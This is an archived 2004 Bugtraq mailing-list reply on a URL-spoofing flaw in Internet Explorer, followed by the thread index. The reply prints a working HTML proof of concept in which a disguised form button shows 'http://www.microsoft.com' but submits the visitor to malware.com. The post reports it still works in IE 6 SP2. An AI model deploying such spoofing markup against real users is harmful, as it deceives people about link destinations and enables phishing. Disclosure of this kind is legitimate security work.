Bugtraq mailing list archives
Re: New URL spoofing bug in Microsoft Internet Explorer
From: "http-equiv () excite com " <1 () malware com>
Date: Sat, 30 Oct 2004 18:16:07 -0000
I also want to play <base href="http://www.microsoft.com"> <a href=><form action="http://www.malware.com" method="get"><INPUT style="BORDER-RIGHT: 0pt; BORDER-TOP: 0pt; FONT-SIZE: 10pt; BORDER-LEFT: 0pt; CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR: transparent;TEXT-DECORATION: underline" type=submit value=http://www.microsoft.com></form></a> This still works in IE 6 SP2 XP 123 whatever, since patched and from back in March 2004 [see: http://www.securityfocus.com/bid/10023 ]. Only difference being the base href and open a href. http://www.malware.com/mwaresoft.html Interestingly Outlook Express gets it right this time. -- http://www.malware.com
Current thread:
- New URL spoofing bug in Microsoft Internet Explorer 0-1-2-3 (Oct 28)
- RE: New URL spoofing bug in Microsoft Internet Explorer Larry Seltzer (Oct 29)
- Re: New URL spoofing bug in Microsoft Internet Explorer GuidoZ (Oct 29)
- RE: New URL spoofing bug in Microsoft Internet Explorer Larry Seltzer (Oct 30)
- Re: New URL spoofing bug in Microsoft Internet Explorer GuidoZ (Oct 29)
- Re: New URL spoofing bug in Microsoft Internet Explorer Christopher J. Pilkington (Oct 29)
- Re: New URL spoofing bug in Microsoft Internet Explorer GuidoZ (Oct 29)
- Re: New URL spoofing bug in Microsoft Internet Explorer GuidoZ (Oct 30)
- <Possible follow-ups>
- Re: New URL spoofing bug in Microsoft Internet Explorer Jérôme (Oct 29)
- Re: New URL spoofing bug in Microsoft Internet Explorer 0-1-2-3 (Oct 30)
- Re: New URL spoofing bug in Microsoft Internet Explorer http-equiv () excite com (Oct 30)
- RE: New URL spoofing bug in Microsoft Internet Explorer Larry Seltzer (Oct 29)